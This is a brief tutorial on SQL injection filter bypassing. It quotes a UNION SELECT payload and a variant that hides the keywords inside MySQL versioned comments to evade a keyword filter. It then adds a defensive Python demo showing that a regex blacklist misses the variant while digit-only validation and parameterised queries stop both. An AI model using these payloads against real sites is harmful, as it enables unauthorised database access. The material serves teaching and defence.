SQL Injection: Filter Bypassing
Filter Bypassing
SQL injection generally relies on SQL keywords such as union, select and from. An administrator may filter these keywords to block such requests, but it is still possible for an attacker to bypass this kind of filter.
Example:
The attacker sends a request like this:
index.php?id=1 union all select 1,2,3--
and the site responds with 406 Not Acceptable. By using a trick like this:
index.php?id=1 /*!union*/ /*!all*/ /*!select*/ 1,2,3--
the attacker bypasses the security. There are many ways to bypass this; it depends on how strongly the administrator has built the filter.
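Why a keyword filter of this kind fails and what holds up instead, as an added example that is not from the original post. The regular expression is a constructed stand-in for the filter, the items table and function names are hypothetical, and SQLite stands in for the site's database.

```python
import re
import sqlite3

# Constructed stand-in for the keyword filter the post describes: it rejects
# requests that contain the phrase "union [all] select".
BLACKLIST = re.compile(r"union\s+(all\s+)?select", re.IGNORECASE)

# The two id values quoted in the post (the second with its comment markers balanced).
PLAIN = "1 union all select 1,2,3--"
COMMENTED = "1 /*!union*/ /*!all*/ /*!select*/ 1,2,3--"


def blacklist_allows(value: str) -> bool:
    """True when the keyword filter lets the value through."""
    return BLACKLIST.search(value) is None


def parse_id(value: str) -> int:
    """Allow-list validation: the id parameter must be a short run of digits."""
    if not re.fullmatch(r"[0-9]{1,9}", value):
        raise ValueError("id must be a positive integer")
    return int(value)


def fetch_title(conn, raw_id):
    """Validate, then bind the id as a parameter so it is never parsed as SQL."""
    try:
        item_id = parse_id(raw_id)
    except ValueError:
        return None  # the application would answer 400 Bad Request here
    row = conn.execute("SELECT title FROM items WHERE id = ?", (item_id,)).fetchone()
    return row[0] if row else None


def demo_db():
    """In-memory database with one constructed row (hypothetical schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE items (id INTEGER PRIMARY KEY, title TEXT)")
    conn.execute("INSERT INTO items VALUES (1, 'first post')")
    return conn


if __name__ == "__main__":
    conn = demo_db()
    for value in ("1", PLAIN, COMMENTED):
        print(repr(value), "| blacklist allows:", blacklist_allows(value),
              "| result:", fetch_title(conn, value))
```

The keyword filter stops only the first value, while the digit-only check plus bound parameter rejects both without needing to know any SQL keywords.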